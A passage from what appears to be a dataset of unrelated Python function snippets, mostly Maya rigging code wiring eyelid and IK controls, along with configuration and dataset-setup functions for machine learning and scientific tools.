'lf_lid01_tp02_ccc', 'lf_lid01_tp03_ccc']\n lf_dn = ['lf_lid01_dn01_ccc', 'lf_lid01_dn02_ccc', 'lf_lid01_dn03_ccc']\n rt_up = ['rt_lid01_tp01_ccc', 'rt_lid01_tp02_ccc', 'rt_lid01_tp03_ccc']\n rt_dn = ['rt_lid01_dn01_ccc', 'rt_lid01_dn02_ccc', 'rt_lid01_dn03_ccc']\n\n # Connect lidRails ramps to lid profile controls\n\n # ========\n # lf_up\n\n # inner\n cmds.connectAttr(lf_up[0] + '.tx', lf_lidrails + '.offsettop[0].offsettop_Position', f=True)\n cmds.connectAttr(lf_up[0] + '.ty', lf_lidrails + '.offsettop[0].offsettop_FloatValue', f=True)\n # mid\n lf_lid01_um01_adn = cmds.createNode('addDoubleLinear', n='lf_lid01_um01_addDoubleLinear')\n cmds.connectAttr(lf_up[1] + '.tx', lf_lid01_um01_adn + '.input1', f=True)\n cmds.setAttr(lf_lid01_um01_adn + '.input2', 0.5)\n cmds.connectAttr(lf_lid01_um01_adn + '.output', lf_lidrails + '.offsettop[1].offsettop_Position', f=True)\n cmds.connectAttr(lf_up[1] + '.ty', lf_lidrails + '.offsettop[1].offsettop_FloatValue', f=True)\n # outer\n lf_lid01_uo01_adn = cmds.createNode('addDoubleLinear', n='lf_lid01_uo01_addDoubleLinear')\n cmds.connectAttr(lf_up[2] + '.tx', lf_lid01_uo01_adn + '.input1', f=True)\n cmds.setAttr(lf_lid01_uo01_adn + '.input2', 1.0)\n cmds.connectAttr(lf_lid01_uo01_adn + '.output', lf_lidrails + '.offsettop[2].offsettop_Position', f=True)\n 
cmds.connectAttr(lf_up[2] + '.ty', lf_lidrails + '.offsettop[2].offsettop_FloatValue', f=True)\n\n # ========\n # lf_dn\n\n # Reverse node\n lf_dn_rvn = cmds.createNode('reverse', n='lf_lid01_dn01_reverse')\n # inner\n cmds.connectAttr(lf_dn[0] + '.tx', lf_lidrails + '.offsetbottom[0].offsetbottom_Position', f=True)\n cmds.connectAttr(lf_dn[0] + '.ty', lf_dn_rvn + '.inputX', f=True)\n cmds.connectAttr(lf_dn_rvn + '.outputX', lf_lidrails + '.offsetbottom[0].offsetbottom_FloatValue', f=True)\n # mid\n lf_lid01_dm01_adn = cmds.createNode('addDoubleLinear', n='lf_lid01_dm01_addDoubleLinear')\n cmds.connectAttr(lf_dn[1] + '.tx', lf_lid01_dm01_adn + '.input1', f=True)\n cmds.setAttr(lf_lid01_dm01_adn + '.input2', 0.5)\n cmds.connectAttr(lf_lid01_dm01_adn + '.output', lf_lidrails + '.offsetbottom[1].offsetbottom_Position', f=True)\n cmds.connectAttr(lf_dn[1] + '.ty', lf_dn_rvn + '.inputY', f=True)\n cmds.connectAttr(lf_dn_rvn + '.outputY', lf_lidrails + '.offsetbottom[1].offsetbottom_FloatValue', f=True)\n # outer\n lf_lid01_do01_adn = cmds.createNode('addDoubleLinear', n='lf_lid01_do01_addDoubleLinear')\n cmds.connectAttr(lf_dn[2] + '.tx', lf_lid01_do01_adn + '.input1', f=True)\n cmds.setAttr(lf_lid01_do01_adn + '.input2', 1.0)\n cmds.connectAttr(lf_lid01_do01_adn + '.output', lf_lidrails + '.offsetbottom[2].offsetbottom_Position', f=True)\n cmds.connectAttr(lf_dn[2] + '.ty', lf_dn_rvn + '.inputZ', f=True)\n cmds.connectAttr(lf_dn_rvn + '.outputZ', lf_lidrails + '.offsetbottom[2].offsetbottom_FloatValue', f=True)\n\n # ========\n # rt_up\n\n # inner\n rt_lid01_ui01_asn = cmds.createNode('plusMinusAverage', n='rt_lid01_ui01_plusMinusAverage')\n cmds.setAttr(rt_lid01_ui01_asn + '.operation', 2)\n cmds.setAttr(rt_lid01_ui01_asn + '.input1D[0]', 1.0)\n cmds.connectAttr(rt_up[0] + '.tx', rt_lid01_ui01_asn + '.input1D[1]', f=True)\n cmds.connectAttr(rt_lid01_ui01_asn + '.output1D', rt_lidrails + '.offsettop[2].offsettop_Position', f=True)\n cmds.connectAttr(rt_up[0] + '.ty', rt_lidrails + '.offsettop[2].offsettop_FloatValue', f=True)\n # mid\n rt_lid01_um01_mdn = cmds.createNode('multDoubleLinear', n='rt_lid01_um01_multDoubleLinear')\n rt_lid01_um01_adn = cmds.createNode('addDoubleLinear', n='rt_lid01_um01_addDoubleLinear')\n cmds.connectAttr(rt_up[1] + '.tx', rt_lid01_um01_mdn + '.input1', f=True)\n cmds.setAttr(rt_lid01_um01_mdn + '.input2', -1.0)\n cmds.connectAttr(rt_lid01_um01_mdn + '.output', rt_lid01_um01_adn + '.input1', f=True)\n cmds.setAttr(rt_lid01_um01_adn + '.input2', 0.5)\n cmds.connectAttr(rt_lid01_um01_adn + '.output', rt_lidrails + '.offsettop[1].offsettop_Position', f=True)\n cmds.connectAttr(rt_up[1] + '.ty', rt_lidrails + '.offsettop[1].offsettop_FloatValue', f=True)\n # outer\n rt_lid01_uo_mdn = cmds.createNode('multDoubleLinear', n='rt_lid01_uo_multDoubleLinear')\n cmds.connectAttr(rt_up[2] + '.tx', rt_lid01_uo_mdn + '.input1', f=True)\n cmds.setAttr(rt_lid01_uo_mdn + '.input2', -1.0)\n cmds.connectAttr(rt_lid01_uo_mdn + '.output', rt_lidrails + '.offsettop[0].offsettop_Position', f=True)\n cmds.connectAttr(rt_up[2] + '.ty', rt_lidrails + '.offsettop[0].offsettop_FloatValue', f=True)\n\n # ========\n # rt_dn\n\n # Reverse node\n rt_dn_rvn = cmds.createNode('reverse', n='rt_lid01_dn01_reverse')\n # inner\n rt_lid01_di01_asn = cmds.createNode('plusMinusAverage', n='rt_lid01_di01_plusMinusAverage')\n cmds.setAttr(rt_lid01_di01_asn + '.operation', 2)\n cmds.setAttr(rt_lid01_di01_asn + '.input1D[0]', 1.0)\n cmds.connectAttr(rt_dn[0] + '.tx', rt_lid01_di01_asn + '.input1D[1]', 
f=True)\n cmds.connectAttr(rt_lid01_di01_asn + '.output1D', rt_lidrails + '.offsetbottom[0].offsetbottom_Position', f=True)\n cmds.connectAttr(rt_dn[0] + '.ty', rt_dn_rvn + '.inputX', f=True)\n cmds.connectAttr(rt_dn_rvn + '.outputX', rt_lidrails + '.offsetbottom[0].offsetbottom_FloatValue', f=True)\n # mid\n rt_lid01_dm01_asn = cmds.createNode('plusMinusAverage', n='rt_lid01_dm01_plusMinusAverage')\n cmds.setAttr(rt_lid01_dm01_asn + '.operation', 2)\n cmds.setAttr(rt_lid01_dm01_asn + '.input1D[0]', 0.5)\n cmds.connectAttr(rt_dn[1] + '.tx', rt_lid01_dm01_asn + '.input1D[1]', f=True)\n cmds.connectAttr(rt_lid01_dm01_asn + '.output1D', rt_lidrails + '.offsetbottom[1].offsetbottom_Position', f=True)\n cmds.connectAttr(rt_dn[1] + '.ty', rt_dn_rvn + '.inputY', f=True)\n cmds.connectAttr(rt_dn_rvn + '.outputY', rt_lidrails + '.offsetbottom[1].offsetbottom_FloatValue', f=True)\n # outer\n rt_lid01_do01_mdn = cmds.createNode('multDoubleLinear', n='rt_lid01_do01_multDoubleLinear')\n cmds.connectAttr(rt_dn[2] + '.tx', rt_lid01_do01_mdn + '.input1', f=True)\n cmds.setAttr(rt_lid01_do01_mdn + '.input2', -1.0)\n cmds.connectAttr(rt_lid01_do01_mdn + '.output', rt_lidrails + '.offsetbottom[2].offsetbottom_Position', f=True)\n cmds.connectAttr(rt_dn[2] + '.ty', rt_dn_rvn + '.inputZ', f=True)\n cmds.connectAttr(rt_dn_rvn + '.outputZ', rt_lidrails + '.offsetbottom[2].offsetbottom_FloatValue', f=True)", "def __init__(self, yaml_file = 'options_modeling.yaml'):\n\n self.reproj_th = 2.5\n self.min_matched_views = 3\n self.descriptors = {'SIFT': 'sift'} # Descriptor name and module name\n self.mask_suffix = '*_mask.png'\n \n # If there is an options file, it will overwrite the defaults \n if yaml_file is not None:\n self.load(yaml_file)", "def connectControl(*args, fileName: bool=True, index: int=0, preventContextualMenu: bool=True,\n preventOverride: bool=True, **kwargs)->None:\n pass", "def setup_fourCtrl(lf_lidrails, rt_lidrails):\n # Declare control variables\n lf_up = ['L_upperLid1_ctrl', 'L_upperLid2_ctrl', 'L_upperLid3_ctrl', 'L_upperLid4_ctrl']\n lf_dn = ['L_lowerLid1_ctrl', 'L_lowerLid2_ctrl', 'L_lowerLid3_ctrl', 'L_lowerLid4_ctrl']\n rt_up = ['R_upperLid1_ctrl', 'R_upperLid2_ctrl', 'R_upperLid3_ctrl', 'R_upperLid4_ctrl']\n rt_dn = ['R_lowerLid1_ctrl', 'R_lowerLid2_ctrl', 'R_lowerLid3_ctrl', 'R_lowerLid4_ctrl']\n\n # Connect lidRails ramps to lid profile controls\n\n # lf_up =========\n\n # inner\n cmds.connectAttr(lf_up[0] + '.tx', lf_lidrails + '.offsettop[0].offsettop_Position', f=True)\n cmds.connectAttr(lf_up[0] + '.ty', lf_lidrails + '.offsettop[0].offsettop_FloatValue', f=True)\n # mid - inner\n lf_lid01_um01_adn = cmds.createNode('addDoubleLinear', n='lf_lid01_um01_addDoubleLinear')\n cmds.connectAttr(lf_up[1] + '.tx', lf_lid01_um01_adn + '.input1', f=True)\n cmds.setAttr(lf_lid01_um01_adn + '.input2', 0.333)\n cmds.connectAttr(lf_lid01_um01_adn + '.output', lf_lidrails + '.offsettop[1].offsettop_Position', f=True)\n cmds.connectAttr(lf_up[1] + '.ty', lf_lidrails + '.offsettop[1].offsettop_FloatValue', f=True)\n # mid - outer\n lf_lid01_um02_adn = cmds.createNode('addDoubleLinear', n='lf_lid01_um02_addDoubleLinear')\n cmds.connectAttr(lf_up[2] + '.tx', lf_lid01_um02_adn + '.input1', f=True)\n cmds.setAttr(lf_lid01_um02_adn + '.input2', 0.666)\n cmds.connectAttr(lf_lid01_um02_adn + '.output', lf_lidrails + '.offsettop[2].offsettop_Position', f=True)\n cmds.connectAttr(lf_up[2] + '.ty', lf_lidrails + '.offsettop[2].offsettop_FloatValue', f=True)\n # outer\n lf_lid01_uo01_adn = 
cmds.createNode('addDoubleLinear', n='lf_lid01_uo01_addDoubleLinear')\n cmds.connectAttr(lf_up[3] + '.tx', lf_lid01_uo01_adn + '.input1', f=True)\n cmds.setAttr(lf_lid01_uo01_adn + '.input2', 1.0)\n cmds.connectAttr(lf_lid01_uo01_adn + '.output', lf_lidrails + '.offsettop[3].offsettop_Position', f=True)\n cmds.connectAttr(lf_up[3] + '.ty', lf_lidrails + '.offsettop[3].offsettop_FloatValue', f=True)\n\n # lf_dn =========\n\n lf_dn_rvn = cmds.createNode('reverse', n='lf_lid01_dn01_reverse')\n lf_dn02_rvn = cmds.createNode('reverse', n='lf_lid01_dn02_reverse')\n # inner\n cmds.connectAttr(lf_dn[0] + '.tx', lf_lidrails + '.offsetbottom[0].offsetbottom_Position', f=True)\n cmds.connectAttr(lf_dn[0] + '.ty', lf_dn_rvn + '.inputX', f=True)\n cmds.connectAttr(lf_dn_rvn + '.outputX', lf_lidrails + '.offsetbottom[0].offsetbottom_FloatValue', f=True)\n # mid - inner\n lf_lid01_dm01_adn = cmds.createNode('addDoubleLinear', n='lf_lid01_dm01_addDoubleLinear')\n cmds.connectAttr(lf_dn[1] + '.tx', lf_lid01_dm01_adn + '.input1', f=True)\n cmds.setAttr(lf_lid01_dm01_adn + '.input2', 0.333)\n cmds.connectAttr(lf_lid01_dm01_adn + '.output', lf_lidrails + '.offsetbottom[1].offsetbottom_Position', f=True)\n cmds.connectAttr(lf_dn[1] + '.ty', lf_dn_rvn + '.inputY', f=True)\n cmds.connectAttr(lf_dn_rvn + '.outputY', lf_lidrails + '.offsetbottom[1].offsetbottom_FloatValue', f=True)\n # mid - outer\n lf_lid01_dm02_adn = cmds.createNode('addDoubleLinear', n='lf_lid01_dm02_addDoubleLinear')\n cmds.connectAttr(lf_dn[2] + '.tx', lf_lid01_dm02_adn + '.input1', f=True)\n cmds.setAttr(lf_lid01_dm02_adn + '.input2', 0.666)\n cmds.connectAttr(lf_lid01_dm02_adn + '.output', lf_lidrails + '.offsetbottom[2].offsetbottom_Position', f=True)\n cmds.connectAttr(lf_dn[2] + '.ty', lf_dn02_rvn + '.inputX', f=True)\n cmds.connectAttr(lf_dn02_rvn + '.outputX', lf_lidrails + '.offsetbottom[2].offsetbottom_FloatValue', f=True)\n # outer\n lf_lid01_do01_adn = cmds.createNode('addDoubleLinear', n='lf_lid01_do01_addDoubleLinear')\n cmds.connectAttr(lf_dn[3] + '.tx', lf_lid01_do01_adn + '.input1', f=True)\n cmds.setAttr(lf_lid01_do01_adn + '.input2', 1.0)\n cmds.connectAttr(lf_lid01_do01_adn + '.output', lf_lidrails + '.offsetbottom[3].offsetbottom_Position', f=True)\n cmds.connectAttr(lf_dn[3] + '.ty', lf_dn02_rvn + '.inputY')\n cmds.connectAttr(lf_dn02_rvn + '.outputY', lf_lidrails + '.offsetbottom[3].offsetbottom_FloatValue', f=True)\n\n # rt_up =========\n\n # inner\n rt_lid01_ui01_asn = cmds.createNode('plusMinusAverage', n='rt_lid01_ui01_plusMinusAverage')\n cmds.setAttr(rt_lid01_ui01_asn + '.input1D[0]', 1.0)\n cmds.connectAttr(rt_up[0] + '.tx', rt_lid01_ui01_asn + '.input1D[1]', f=True)\n cmds.connectAttr(rt_lid01_ui01_asn + '.output1D', rt_lidrails + '.offsettop[3].offsettop_Position', f=True)\n cmds.connectAttr(rt_up[0] + '.ty', rt_lidrails + '.offsettop[3].offsettop_FloatValue', f=True)\n # mid -inner\n rt_lid01_um01_mdn = cmds.createNode('multDoubleLinear', n='rt_lid01_um01_multDoubleLinear')\n rt_lid01_um01_adn = cmds.createNode('addDoubleLinear', n='rt_lid01_um01_addDoubleLinear')\n cmds.connectAttr(rt_up[2] + '.tx', rt_lid01_um01_mdn + '.input1', f=True)\n cmds.setAttr(rt_lid01_um01_mdn + '.input2', -1.0)\n cmds.connectAttr(rt_lid01_um01_mdn + '.output', rt_lid01_um01_adn + '.input1', f=True)\n cmds.setAttr(rt_lid01_um01_adn + '.input2', 0.333)\n cmds.connectAttr(rt_lid01_um01_adn + '.output', rt_lidrails + '.offsettop[2].offsettop_Position', f=True)\n cmds.connectAttr(rt_up[2] + '.ty', rt_lidrails + 
'.offsettop[2].offsettop_FloatValue', f=True)\n\n # mid - outer\n rt_lid01_um02_mdn = cmds.createNode('multDoubleLinear', n='rt_lid01_um02_multDoubleLinear')\n rt_lid01_um02_adn = cmds.createNode('addDoubleLinear', n='rt_lid01_um02_addDoubleLinear')\n cmds.connectAttr(rt_up[1] + '.tx', rt_lid01_um02_mdn + '.input1', f=True)\n cmds.setAttr(rt_lid01_um02_mdn + '.input2', -1.0)\n cmds.connectAttr(rt_lid01_um02_mdn + '.output', rt_lid01_um02_adn + '.input1', f=True)\n cmds.setAttr(rt_lid01_um02_adn + '.input2', 0.666)\n cmds.connectAttr(rt_lid01_um02_adn + '.output', rt_lidrails + '.offsettop[1].offsettop_Position', f=True)\n cmds.connectAttr(rt_up[1] + '.ty', rt_lidrails + '.offsettop[1].offsettop_FloatValue', f=True)\n\n # outer\n rt_lid01_uo_mdn = cmds.createNode('multDoubleLinear', n='rt_lid01_uo_multDoubleLinear')\n cmds.connectAttr(rt_up[3] + '.tx', rt_lid01_uo_mdn + '.input1', f=True)\n cmds.setAttr(rt_lid01_uo_mdn + '.input2', -1.0)\n cmds.connectAttr(rt_lid01_uo_mdn + '.output', rt_lidrails + '.offsettop[0].offsettop_Position', f=True)\n cmds.connectAttr(rt_up[3] + '.ty', rt_lidrails + '.offsettop[0].offsettop_FloatValue', f=True)\n\n # rt_dn =========\n\n rt_dn_rvn = cmds.createNode('reverse', n='rt_lid01_dn01_reverse')\n rt_dn02_rvn = cmds.createNode('reverse', n='rt_lid01_dn02_reverse')\n # inner\n rt_lid01_di01_asn = cmds.createNode('plusMinusAverage', n='rt_lid01_di01_plusMinusAverage')\n cmds.setAttr(rt_lid01_di01_asn + '.operation', 2)\n cmds.setAttr(rt_lid01_di01_asn + '.input1D[0]', 1.0)\n cmds.connectAttr(rt_dn[0] + '.tx', rt_lid01_di01_asn + '.input1D[1]', f=True)\n cmds.connectAttr(rt_lid01_di01_asn + '.output1D', rt_lidrails + '.offsetbottom[0].offsetbottom_Position', f=True)\n cmds.connectAttr(rt_dn[0] + '.ty', rt_dn_rvn + '.inputX', f=True)\n cmds.connectAttr(rt_dn_rvn + '.outputX', rt_lidrails + '.offsetbottom[0].offsetbottom_FloatValue', f=True)\n # mid - inner\n rt_lid01_dm01_asn = cmds.createNode('plusMinusAverage', n='rt_lid01_dm01_plusMinusAverage')\n cmds.setAttr(rt_lid01_dm01_asn + '.operation', 2)\n cmds.setAttr(rt_lid01_dm01_asn + '.input1D[0]', 0.333)\n cmds.connectAttr(rt_dn[2] + '.tx', rt_lid01_dm01_asn + '.input1D[1]', f=True)\n cmds.connectAttr(rt_lid01_dm01_asn + '.output1D', rt_lidrails + '.offsetbottom[1].offsetbottom_Position', f=True)\n cmds.connectAttr(rt_dn[2] + '.ty', rt_dn_rvn + '.inputY', f=True)\n cmds.connectAttr(rt_dn_rvn + '.outputY', rt_lidrails + '.offsetbottom[1].offsetbottom_FloatValue', f=True)\n # mid - outer\n rt_lid01_dm02_asn = cmds.createNode('plusMinusAverage', n='rt_lid01_dm02_plusMinusAverage')\n cmds.setAttr(rt_lid01_dm02_asn + '.operation', 2)\n cmds.setAttr(rt_lid01_dm02_asn + '.input1D[0]', 0.666)\n cmds.connectAttr(rt_dn[1] + '.tx', rt_lid01_dm02_asn + '.input1D[1]', f=True)\n cmds.connectAttr(rt_lid01_dm02_asn + '.output1D', rt_lidrails + '.offsetbottom[2].offsetbottom_Position', f=True)\n cmds.connectAttr(rt_dn[1] + '.ty', rt_dn02_rvn + '.inputX', f=True)\n cmds.connectAttr(rt_dn02_rvn + '.outputX', rt_lidrails + '.offsetbottom[2].offsetbottom_FloatValue', f=True)\n # outer\n rt_lid01_do01_mdn = cmds.createNode('multDoubleLinear', n='rt_lid01_do01_multDoubleLinear')\n cmds.connectAttr(rt_dn[3] + '.tx', rt_lid01_do01_mdn + '.input1', f=True)\n cmds.setAttr(rt_lid01_do01_mdn + '.input2', -1.0)\n cmds.connectAttr(rt_lid01_do01_mdn + '.output', rt_lidrails + '.offsetbottom[3].offsetbottom_Position', f=True)\n cmds.connectAttr(rt_dn[3] + '.ty', rt_dn02_rvn + '.inputY', f=True)\n cmds.connectAttr(rt_dn02_rvn + '.outputY', 
rt_lidrails + '.offsetbottom[3].offsetbottom_FloatValue')", "def init():\n \n # General parameters\n vect_path = '/home/laura/Documents/STAGE3/outputVectorisation_1705_new_invert/output_60_70/' # graphs directory\n csv_path = '/home/laura/Documents/STAGE3/outputVectorisation_1705_new_invert/output_60_70/tracking3/nodes_for_tracking.csv' # csv file \n dest_path = '/home/laura/Documents/STAGE3/outputVectorisation_1705_new_invert/output_60_70/tracking3/' # output directory\n verbose = True\n main_params = [vect_path, csv_path, dest_path, verbose]\n \n # Linking parameters\n createCSV = True \n forced_matching = True\n search_range = 10\n memory = 3\n adaptive_stop = 5 \n link_params = [createCSV, forced_matching, search_range, memory, \n adaptive_stop]\n \n # Tracking check parameters\n check = True # True to create a check image\n img_path = '/home/laura/Documents/STAGE3/outputVectorisation_1705_new_invert/output_60_70/tracking2/MosaicTest_t070.jpg' # image file on which to draw\n size = 1 # size of the nodes drawing\n check_params = [check, img_path, size]\n \n return main_params, link_params, check_params", "def create_ik_setup(controls, joints):\n\n # Create control offset transforms\n exp_tf_ms = []\n for ctl in controls:\n par = cmds.listRelatives(ctl, parent=True)\n buf = create_offset_transform(ctl, BUF)\n exp = create_offset_transform(ctl, EXP)\n off = create_offset_transform(ctl, OFF)\n cmds.parent(ctl, off)\n cmds.parent(off, exp)\n cmds.parent(exp, buf)\n if par:\n cmds.parent(buf, par[0])\n exp_tf_ms.append(buf)\n\n root_control, pole_control, goal_control = controls\n handle, effector = cmds.ikHandle(sj=joints[0], ee=joints[-1], sol='ikRPsolver')\n cmds.setAttr('{}.hiddenInOutliner'.format(handle), True)\n cmds.orientConstraint(goal_control, joints[-1], mo=True)\n cmds.parent(handle, goal_control)\n cmds.hide(handle)\n\n # Connect root control to ik joint offset group\n ik_joints_offset = cmds.listRelatives(joints[0], p=True)[0]\n cmds.parentConstraint(root_control, ik_joints_offset, mo=True)\n cmds.scaleConstraint(root_control, ik_joints_offset, mo=True)\n\n # Connect twisting and pole vector control\n cmds.addAttr(goal_control, ln='twist', at='float', k=True)\n cmds.connectAttr('{}.twist'.format(goal_control), '{}.twist'.format(handle))\n cmds.poleVectorConstraint(pole_control, handle)\n\n # Add PV visibility attribute\n cmds.addAttr(goal_control, shortName='pv', longName='poleVector', at='bool', k=True)\n cmds.connectAttr('{}.pv'.format(goal_control), '{}.v'.format(pole_control))\n cmds.setAttr('{}.pv'.format(goal_control),1)\n\n # Add curve that points elbow to pole control\n crv = cmds.curve(p=[[0, 0, 0], [0, 1, 0]], d=1)\n cmds.connectAttr('{}.visibility'.format(pole_control), '{}.visibility'.format(crv))\n lock_hide_attrs(crv, attrs=['tx', 'ty', 'tz', 'rx', 'ry', 'rz', 'sx', 'sy', 'sz'])\n cmds.setAttr('{}.overrideEnabled'.format(crv), True)\n cmds.setAttr('{}.overrideDisplayType'.format(crv), 2)\n decomp_joint = cmds.createNode('decomposeMatrix')\n decomp_control = cmds.createNode('decomposeMatrix')\n cmds.connectAttr('{}.worldMatrix'.format(joints[1]), '{}.inputMatrix'.format(decomp_joint))\n cmds.connectAttr('{}.worldMatrix'.format(pole_control), '{}.inputMatrix'.format(decomp_control))\n cmds.connectAttr('{}.outputTranslate'.format(decomp_joint), '{}.controlPoints[0]'.format(crv))\n cmds.connectAttr('{}.outputTranslate'.format(decomp_control), '{}.controlPoints[1]'.format(crv))\n\n return handle, crv, exp_tf_ms", "def setup(instname):\n global reducer, 
inst_name,van_mass,bleed_switch,rate,pixels\n # debugging (allows to reload changed DirectEnergyConversion package from Mantid)\n\n if instname=='MAR' or instname=='mar':\n print 'setup mari'\n inst_name='MAR'\n reducer = DRC.setup_reducer('MARI')\n bleed_switch=False\n rate=0.0\n pixels=0\n elif instname=='MER' or instname=='mer':\n print 'setup merlin'\n inst_name='MER'\n reducer = DRC.setup_reducer('MERLIN')\n bleed_switch=True\n rate=0.01\n pixels=80\n elif instname=='MAP' or instname=='map':\n print 'setup maps'\n inst_name='MAP'\n reducer = DRC.setup_reducer('MAPS')\n bleed_switch=False\n rate=0.0\n pixels=0.0\n elif instname=='LET' or instname=='let':\n print 'setup let'\n inst_name='LET'\n reducer = DRC.setup_reducer('LET')\n bleed_switch=True\n rate=0.01\n pixels=80\n elif instname=='ARCS' or instname=='arcs':\n print 'setup Arcs'\n inst_name='ARC'\n reducer = DRC.setup_reducer('ARCS')\n bleed_switch=False\n rate=0.01\n pixels=80\n elif instname=='SEQ' or instname=='seq':\n print 'setup Sequoia'\n inst_name='SEQ'\n reducer = DRC.setup_reducer('SEQUOIA')\n bleed_switch=False\n rate=0.01\n pixels=80\n elif instname=='CNCS' or instname=='cncs':\n print 'setup cncs'\n inst_name='SEQ'\n reducer = DRC.setup_reducer('CNCS')\n bleed_switch=False\n rate=0.01\n pixels=80\n elif instname=='HYSPEC' or instname=='hyspec':\n print 'setup hyspec'\n inst_name='SEQ'\n reducer = DRC.setup_reducer('HYSPEC')\n bleed_switch=False\n rate=0.01\n pixels=80\n else:\n print 'Instrument name not defined'\n return \n van_mass=reducer.get_default_parameter('vanadium-mass')", "def __init__(self, parent):\n super(Demo4, self).__init__(parent)\n self.scenes = []\n self.draw_axes = True\n self.lighting = True\n self.current_scene = 0\n self.objects = []\n self.diffuse_light = [0.8, 0.8, 0.8, 1]", "def __init__(self, cat_path, img_path, orig_json_path, rst_json_path,\n layers, **kwargs):\n\n # Initialize class attributes\n self.name = \"AI2D-RST\" # Dataset name\n self.cat_path = Path(cat_path) # Path to categories JSON\n self.img_path = Path(img_path) # Path to AI2D images\n self.orig_json_path = Path(orig_json_path) # Path to AI2D JSON\n self.rst_json_path = Path(rst_json_path) # Path to AI2D-RST JSON\n\n # Check input types\n assert self.cat_path.is_file()\n assert self.img_path.is_dir()\n assert self.orig_json_path.is_dir()\n assert self.rst_json_path.is_dir()\n assert layers in ['grouping', 'grouping+connectivity', 'connectivity',\n 'discourse', 'discourse+connectivity']\n\n # Load node and edge dictionaries\n self.node_dict = node_dicts\n self.edge_dict = edge_dicts\n\n # Load diagram labels from the labels JSON file\n categories = self._load_annotation(cat_path)\n\n # Initialize label encoder and encode integer labels\n le = LabelEncoder().fit(list(categories.values()))\n\n # Create a dictionary mapping encoded class integers to their names\n self.class_names = {k: v for k, v in zip(le.transform(le.classes_),\n le.classes_)}\n\n # Create a dictionary mapping filenames to labels\n label_dict = {k: le.transform([v]) for k, v in categories.items()}\n\n # Convert labels into a numpy array for calculating class weights\n label_arr = np.concatenate(list(label_dict.values()))\n\n # Calculate class weights\n class_weights = compute_class_weight(class_weight='balanced',\n classes=np.unique(label_arr),\n y=label_arr)\n\n # Wrap class weights into a torch Tensor and make available through\n # attribute\n self.class_weights = torch.FloatTensor(class_weights)\n\n # Get diagram identifiers and labels\n self.file_ids = 
list(label_dict.keys())\n self.labels = list(label_dict.values())\n\n # Return DGL graph objects by default\n self._return_nx = False\n\n # Check if NetworkX graphs have been requested\n if kwargs and 'nx' in kwargs:\n\n # Set the flag for returning NetworkX graphs to True\n if kwargs['nx']:\n \n self._return_nx = True\n\n # Check if node type information should be added to node features\n if kwargs and kwargs['node_types']:\n\n # Set add node types flag to True\n self._add_node_types = True\n\n # Check which node label dictionary to use: this depends on the kind\n # of annotation layers requested\n if 'discourse' in layers:\n\n # Get the node labels from the node dictionary & cast to array\n node_labels = list(self.node_dict['discourse'].values())\n node_labels = np.asarray(node_labels)\n\n else:\n\n # Get the node labels from the node dictionary & cast to array\n node_labels = list(self.node_dict['grouping'].values())\n node_labels = np.asarray(node_labels)\n\n # Initialize label binarizer and fit to node labels\n self._node_binarizer = LabelBinarizer().fit(node_labels)\n\n else:\n\n self._add_node_types = False\n\n # Check if smoothed labels have been requested\n if 'smooth' in kwargs and kwargs['smooth']:\n\n # Set the flag for smoothed labels to True\n self._smooth_labels = True\n\n else:\n\n self._smooth_labels = False\n\n # Initialize label binarizer for RST relations if needed\n if 'discourse' in layers:\n\n # Get the RST relations from the node dictionary\n rst_relations = np.asarray(list(self.node_dict['relations'].values()))\n\n # Initialize label binarizer and fit to node labels\n self._rst_binarizer = LabelBinarizer().fit(rst_relations)\n\n # Load the requested annotation and create the graphs accordingly\n self._load(layers)\n\n # Get number of unique diagram classes in the dataset\n self.n_classes = len(np.unique(self.labels))\n\n # Get the number of node and edge classes for DGL graphs (grouping +\n # connectivity)\n if 'discourse' not in layers and not self._return_nx:\n\n # Get unique node and edge types for graphs that don't use typed\n # nodes or edges\n node_list = [x.ndata['kind'].flatten() for x in self.diagrams]\n self.n_node_classes = len(np.unique(torch.cat(node_list).numpy()))\n\n edge_list = [x.edata['kind'].flatten() for x in self.diagrams]\n self.n_edge_classes = len(np.unique(torch.cat(edge_list).numpy()))\n\n # Do the same for DGLHeteroGraphs (discourse)\n if 'discourse' in layers and not self._return_nx:\n\n node_list = np.concatenate(np.asarray([x.ntypes for x in\n self.diagrams]))\n self.n_node_classes = len(np.unique(node_list))\n\n edge_list = np.concatenate(np.asarray([x.etypes for x in\n self.diagrams]))\n self.n_edge_classes = len(np.unique(edge_list))", "def setup(args):\n # chaparral,denseForest,lake,canyon,burning,burnt = neighbours\n config_path = args[0]\n config = utils.load(config_path)\n # -- THE CA MUST BE RELOADED IN THE GUI IF ANY OF THE BELOW ARE CHANGED --\n config.title = \"Forest Fire\"\n config.dimensions = 2\n config.states = \\\n (\n CHAPARRAL,\n DENSE_FORREST,\n LAKE,\n CANYON,\n BURNING,\n BURNT,\n START_BURN,\n END_BURN\n )\n\n # ------------ -------------------------------------------------------------\n\n config.state_colors = \\\n [\n (0.6,0.6,0), #chaparral\n (0,0.4,0), #dense forrest\n (0,0.5,1), #lake\n (0.5,0.5,0.5), #canyon\n (1,0,0), #burning\n (0.25,0.25,0.25), #burnt\n (1,0.7,0), #starting to burn\n (0.8,0,0.2) #ending burn\n ]\n\n config.grid_dims = (grid_size, grid_size)\n config.num_generations = 1000\n 
config.set_initial_grid(initial_grid)\n config.wrap = False\n\n # --------------------------------------------------------------------\n\n # the GUI calls this to pass the user defined config\n # into the main system with an extra argument\n # do not change\n if len(args) == 2:\n config.save()\n sys.exit()\n return config", "def setup(args):\n cfg = get_cfg()\n\n cfg.merge_from_file(model_zoo.get_config_file(\"COCO-Detection/faster_rcnn_X_101_32x8d_FPN_3x.yaml\"))\n cfg.merge_from_list(args.opts)\n\n # configs for training\n if args.small_vidor: # cfg.DATASETS.VIDOR.SIZE == 'small':\n cfg.DATASETS.TRAIN = (\"vidor_small_train\",)\n elif args.small_vidor_10imgs: # cfg.DATASETS.VIDOR.SIZE == 'small-10imgs':\n cfg.DATASETS.TRAIN = (\"vidor_small_10imgs_train\",)\n else:\n cfg.DATASETS.TRAIN = (\"vidor_large_train\",)\n # cfg.DATALOADER.NUM_WORKERS = 2\n if not args.eval_only:\n cfg.MODEL.WEIGHTS = model_zoo.get_checkpoint_url(\"COCO-Detection/faster_rcnn_X_101_32x8d_FPN_3x.yaml\") # Let training initialize from model zoo\n factor = 4\n cfg.SOLVER.IMS_PER_BATCH = 16 * factor\n cfg.SOLVER.BASE_LR = 0.0001 * factor # finetune using 10x smaller base_lr\n cfg.SOLVER.MAX_ITER = 270000 // factor \n cfg.SOLVER.STEPS = [210000 // factor, 250000 // factor]\n # 